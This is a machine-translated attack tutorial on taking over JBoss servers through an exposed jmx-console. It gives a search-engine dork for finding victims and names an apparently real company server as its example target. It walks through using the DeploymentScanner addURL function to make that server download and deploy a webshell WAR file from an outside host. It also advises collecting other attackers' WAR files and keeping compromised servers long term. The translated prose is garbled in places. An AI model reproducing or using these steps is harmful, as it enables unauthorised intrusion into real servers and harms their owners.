JBoss is a large application platform, ordinary users is difficult to come into contact with. The more difficult to contact something the more I advanced, to borrow a Beijing bus driver Lee su Li of the word“force can only dry out the incompetent, hard to dry out outstanding”, in security is also true, although the JBoss platform difficult to master, but as long as the Find Jboss's Achilles heel, the same as the easy penetration, this article on how to for Jboss a loophole to get their Webshell, because it is Research, so the only point to so far.
1. Use the vulnerability feature of the search
In Jboss the entire exploit in a notable feature is the“8 0 8 0/jmx-console/”, of course, the entire there are also other features, with this feature mainly to facilitate in the Google search now using google search address: www.google.com.hk, the use of Baidu search results than Google. In the Google input box, enter: inurl:"8 0 8 0/jmx-console/", will come out a bunch of results.
2. Access to the site and perform vulnerability test
To search out the records one by one to view, see whether the normal access. Due to the search engine's timeliness, some sites while the results in the search results, but due to various reasons the site has been unable to access. If the site can not normally access is discarded. From the results, we find<http://oa.tsingtaobeer-sales.com:8080/jmx-console/>site can be a normal visit, and then in the page search for“jboss. deployment”, and found* flavor=URL,type=DeploymentScanner, click the link to see whether the normal access, as shown in Figure 1.
Figure 1 test Jboss page
3. Add Webshell. war file address
The Jsp shell is compressed into a war file, and then the war uploaded to the Internet can access the website on, for example, in this case the war of the real address“http://www.cam*. com. hk/forum/forumdata/cache/war. war”is. The current open page address“http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=a jboss. deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL”, in the page to look for“void addURL()”function, find the“http://www.cam***. com. hk/forum/forumdata/cache/cmd. war”copy“ParamValue”, as shown in Figure 2, and then click“invoke”http://www.cam*. com. hk/forum/forumdata/cache/war. waris downloaded to the local server for deployment. After successful deployment will be given the appropriate prompt, as shown in Figure 3.
Figure 2 Using the addURL function to download and deploy the war file
Figure 3 The operation is executed successfully
4. Application to modify the setting to take effect
Again back to the main interface, as shown in Figure 4, In Resources will see the newly added war address, click“Apply Change”to make the settings take effect.
Figure 4 application to modify the setting to take effect
5. Replenish the“Arsenal of weapons”
By observing the Resources found to the list is to deploy the war address, if through the previous steps in Resources, only your own address, then congratulations you are the first one to get the server, get the server permissions can be upgraded and reinforced, upgraded and reinforced, the server after the May long-term by you to“maintain”and use. In the present embodiment will be Resources of values you copied to Notepad, and then finishing, the dude has 26war file. Its war in the address list as follows:
In order to access these address, of course, there is a simple way to copy the address and paste it in Flashget by Flashget to download. While these address some of the war can not download, but by to download the war file collation and analysis, to obtain 4-Use war file, the author in the test on the application of the war file issue, back and forth toss a few back without success, into obtaining the war file, these will be a good war classified Arsenal of weapons, full ammunition!
6. Get the Webshell
In the browser enter the address“http://oa.tsingtaobeer-sales.com:8080/war”test Webshell whether the normal access, as shown in Figure 5, we compare the familiar with the JSP Webshell page. Special attention is required in the deployment process may be due to the war file and the site path of the different, possible its access to the address there will be some deviation, so need more test, some directly accessible and some require an extra war Pack name. About the Jboss acquisition for further details, interested friends can be towww.antian365.comto view the JBoss acquisition Webshell video.
Figure 5 to get Webshell